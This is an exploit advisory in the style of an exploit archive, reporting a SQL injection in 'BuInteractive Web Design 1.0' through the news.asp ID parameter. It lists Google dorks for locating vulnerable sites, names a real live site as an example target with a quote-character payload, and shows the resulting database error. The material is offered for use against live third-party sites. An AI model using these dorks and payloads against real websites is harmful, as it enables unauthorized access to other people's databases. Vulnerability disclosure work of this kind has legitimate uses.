BuInteractive Web Design version 1.0 suffers from a remote SQL injection vulnerability.
bde94d27db3e8dc62f7db9fe08064093############################################
# Exploit Title : BuAdegnteractive Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : buinteractive.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0 - Microsoft ASP.NET - IIS 6.0
+ Windows Server Operating System
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Exploit Reference Link :
cxsecurity.com/ascii/WLB-2018060020
############################################
BuAdegnteractive Web Design E-Commerce Social Media
Digital Marketing SQL Injection Vulnerability
############################################
# Google Dork : intext:''Bu interactive''
# Google Dork : inurl:''/news.asp?ID='' site:oymaksan.com.tr
# Exploit : /news.asp?ID=[SQL Injection]
############################################
# Example Site =>
oymaksan.com.tr/news.asp?ID=25%27
=> [ Proof of Concept for SQL Inj ] => archive.is/1X8m5
############################################
# SQL-DB Error =>
ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/includes/inc_main.asp, line 1683
############################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################